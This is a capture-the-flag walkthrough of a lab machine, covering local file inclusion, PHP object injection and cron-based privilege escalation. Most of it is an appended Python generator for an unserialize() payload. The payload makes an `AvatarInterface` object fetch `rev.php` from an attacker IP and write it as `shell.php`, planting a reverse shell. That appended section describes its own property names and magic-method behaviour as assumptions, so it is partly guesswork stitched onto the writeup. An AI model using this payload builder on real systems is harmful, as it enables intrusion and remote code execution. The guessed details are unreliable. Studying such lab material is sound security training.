The video consists of my process of enumeration and overall hacking of the machine; please use it as a walkthrough.
This box has several vulnerabilities:
- Local File Inclusion / path traversal - The query string of the `img.php` file is vulnerable to this; with it we can download the site map that I discovered using Burp.
- Deserialization / PHP object injection - I saw this in the `utils.php` file, and I prepared a payload for `AvatarInterface`, since this is the class that uses magic methods and it has the `file_get_contents` function, which we are going to use to pull the PHP reverse shell.
- Linux privilege escalation - By pure luck I noticed the `/opt/` folder, and I immediately noted that this must be the vector to leverage for privilege escalation. A much better way to figure this out is the pspy tool, which would have shown me this command being run as root:

  `timeout 10 /bin/bash -c /opt/renew_cert.sh /home/bill/Certs/broscience.crt`

  I did look up some hints, thanks to gatogamer1155 and his writeup for this machine.
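To make the PHP object injection step concrete, here is an added example (my own code, not the box's `utils.php` and not from the video) that builds the serialized string `unserialize()` expects. It implements the PHP serialization grammar for strings, ints, bools, null, arrays and objects, including the `\0*\0name` / `\0Class\0name` encoding for protected and private properties, and then emits an `AvatarInterface` object. The class name comes from the writeup; the property names `tmp` and `imgPath`, the listener URL `http://10.10.14.2/rev.php`, the output path and the `__wakeup` behaviour assumed in the comments are my assumptions for illustration, not facts taken from the page. How the application ingests the payload (cookie, POST field, etc.) is whatever the vulnerable code path reads.

```python
"""Build PHP unserialize() payloads (PHP object injection helper).

Added example: none of this is the target's own code. Class name
AvatarInterface is from the writeup; property names, URLs and paths
below are assumptions for illustration only.
"""
from typing import Any, Dict, Optional


class PhpObject:
    """A PHP object to serialize: class name plus ordered properties."""

    def __init__(self, class_name: str, props: Dict[str, Any]):
        self.class_name = class_name
        self.props = props


def php_prop(name: str, visibility: str = "public", owner: Optional[str] = None) -> str:
    """Return the property key PHP uses for a given visibility.

    public    -> "name"
    protected -> "\\0*\\0name"
    private   -> "\\0Owner\\0name"  (owner = declaring class)
    The NUL bytes count towards the s:<len> length prefix.
    """
    if visibility == "public":
        return name
    if visibility == "protected":
        return f"\x00*\x00{name}"
    if visibility == "private":
        if owner is None:
            raise ValueError("private property needs the declaring class name")
        return f"\x00{owner}\x00{name}"
    raise ValueError(f"unknown visibility: {visibility}")


def php_serialize(value: Any) -> str:
    """Serialize a Python value into PHP's serialize() wire format."""
    if value is None:
        return "N;"
    if isinstance(value, bool):                      # bool before int: bool is an int subclass
        return f"b:{int(value)};"
    if isinstance(value, int):
        return f"i:{value};"
    if isinstance(value, str):
        # PHP counts BYTES, not characters: non-ASCII text needs the UTF-8 length.
        return f's:{len(value.encode("utf-8"))}:"{value}";'
    if isinstance(value, (list, tuple)):
        body = "".join(f"i:{i};{php_serialize(v)}" for i, v in enumerate(value))
        return f"a:{len(value)}:{{{body}}}"
    if isinstance(value, dict):
        body = "".join(f"{php_serialize(k)}{php_serialize(v)}" for k, v in value.items())
        return f"a:{len(value)}:{{{body}}}"
    if isinstance(value, PhpObject):
        body = "".join(f"{php_serialize(k)}{php_serialize(v)}" for k, v in value.props.items())
        return f'O:{len(value.class_name)}:"{value.class_name}":{len(value.props)}:{{{body}}}'
    raise TypeError(f"cannot serialize {type(value).__name__}")


def build_avatar_payload(fetch_url: str, write_path: str) -> str:
    """Serialized AvatarInterface whose magic method (assumed __wakeup) would
    file_get_contents(fetch_url) and write the result to write_path.

    ASSUMPTION: property names 'tmp' (source) and 'imgPath' (destination);
    adjust to whatever the real class declares.
    """
    obj = PhpObject("AvatarInterface", {"tmp": fetch_url, "imgPath": write_path})
    return php_serialize(obj)


if __name__ == "__main__":
    # Constructed sample values; the URL/path are placeholders, not from the page.
    print(build_avatar_payload("http://10.10.14.2/rev.php", "./shell.php"))
```

A good sanity check before firing a payload is to paste the output into `php -r 'var_dump(unserialize($argv[1]));' '<payload>'` on your own machine with a stub class: a single wrong byte length makes `unserialize()` return `false` silently, which looks exactly like "the app is not vulnerable".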